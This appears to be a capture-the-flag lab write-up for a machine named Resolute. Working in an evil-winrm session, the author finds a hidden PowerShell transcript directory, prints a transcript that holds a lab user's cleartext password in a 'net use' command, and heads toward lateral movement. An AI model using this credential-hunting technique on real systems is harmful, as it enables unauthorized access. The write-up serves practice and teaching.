InfoSec LAB

Resolute_PowerShell_Transcript

Created: 5 min read

PowerShell Transcript

Checking the target system environment after performing some basic enumeration

*evil-winrm* ps c:\> ls
 
 
    directory: C:\
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d-r---        12/4/2019   2:46 AM                Users
d-----        6/10/2023  11:59 AM                Windows

At the first glance, there isn’t anything unique to this system.

*evil-winrm* ps c:\> ls -Force
 
 
    directory: C:\
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        6/10/2023  11:20 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        6/10/2023  11:59 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        6/10/2023   6:43 AM      402653184 pagefile.sys

checking the hidden files and directory with the -force flag, however, reveals an unusual directory; c:\PSTranscripts

the c:\PSTranscripts\ directory is not a default system directory in the root of the C:\ drive. It is not a part of the standard Windows operating system installation.

however, the c:\PSTranscripts\ directory is commonly used by PowerShell users to store transcripts of PowerShell sessions. Transcripts are records of PowerShell commands and their outputs during a session.

It is likely that it has been manually created by a PowerShell user or as part of a PowerShell script or module installation. Its purpose would be to store transcripts of PowerShell sessions for record-keeping or troubleshooting purposes.

it is possible that it could have been generated by the powershell cmdlet, start-transcript

*evil-winrm* ps c:\> cd PSTranscripts ; ls -Force
 
 
    directory: C:\PSTranscripts
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203
 
*evil-winrm* ps c:\PSTranscripts> cd 20191203 ; ls -Force
 
 
    directory: C:\PSTranscripts\20191203
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Going through 2 sub-directories nested within, there is a text file That must be it

*evil-winrm* ps c:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
start time: 20191203063201
username: MEGABANK\ryan
runas user: MEGABANK\ryan
machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
host application: C:\Windows\system32\wsmprovhost.exe -Embedding
process id: 2800
psversion: 5.1.14393.2273
psedition: Desktop
pscompatibleversions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
buildversion: 10.0.14393.2273
clrversion: 4.0.30319.42000
wsmanstackversion: 3.0
psremotingprotocolversion: 2.3
serializationversion: 1.1.0.1
**********************
command start time: 20191203063455
**********************
ps>terminatingerror(): "System error."
>> commandinvocation(invoke-expression): "Invoke-Expression"
>> parameterbinding(invoke-expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> commandinvocation(out-string): "Out-String"
>> parameterbinding(out-string): name="Stream"; value="True"
**********************
command start time: 20191203063455
**********************
ps>parameterbinding(out-string): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
command start time: 20191203063515
**********************
ps>commandinvocation(invoke-expression): "Invoke-Expression"
>> parameterbinding(invoke-expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
 
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> commandinvocation(out-string): "Out-String"
>> parameterbinding(out-string): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
start time: 20191203063515
username: MEGABANK\ryan
runas user: MEGABANK\ryan
machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
host application: C:\Windows\system32\wsmprovhost.exe -Embedding
process id: 2800
psversion: 5.1.14393.2273
psedition: Desktop
pscompatibleversions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
buildversion: 10.0.14393.2273
clrversion: 4.0.30319.42000
wsmanstackversion: 3.0
psremotingprotocolversion: 2.3
serializationversion: 1.1.0.1
**********************
**********************
command start time: 20191203063515
**********************
ps>commandinvocation(out-string): "Out-String"
>> parameterbinding(out-string): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
at line:1 char:1
+ cmd /c net use x: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + categoryinfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + fullyqualifiederrorid : NativeCommandError
cmd : The syntax of this command is:
at line:1 char:1
+ cmd /c net use x: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + categoryinfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + fullyqualifiederrorid : NativeCommandError
**********************
Windows PowerShell transcript start
start time: 20191203063515
username: MEGABANK\ryan
runas user: MEGABANK\ryan
machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
host application: C:\Windows\system32\wsmprovhost.exe -Embedding
process id: 2800
psversion: 5.1.14393.2273
psedition: Desktop
pscompatibleversions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
buildversion: 10.0.14393.2273
clrversion: 4.0.30319.42000
wsmanstackversion: 3.0
psremotingprotocolversion: 2.3
serializationversion: 1.1.0.1
**********************

based on the content of the transcript file, it appears that the user, with the username “megabank\ryan,” was attempting to perform the following actions:

  1. the user executed a command to invoke the expression -join($id,'ps ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> '). This command seems to be constructing a prompt string that includes the session ID, username, computer name, and current directory path.
  2. The user encountered a “System error” terminating error, which caused the PowerShell session to exit.
  3. afterward, the user entered a new command prompt: PS megabank\ryan@RESOLUTE Documents>. This suggests that the user navigated to the Documents directory.
  4. next, the user executed a command to invoke the expression cmd /c net use x: \\fs01\backups ryan Serv3r4Admin4cc123!. This command appears to be an attempt to map a network drive (X:) to the UNC path \\fs01\backups using the provided credentials.

There is the CLEARTEXT credential for the ryan user. Moving on to the Lateral Movement phase

Interactive Graph View

Backlinks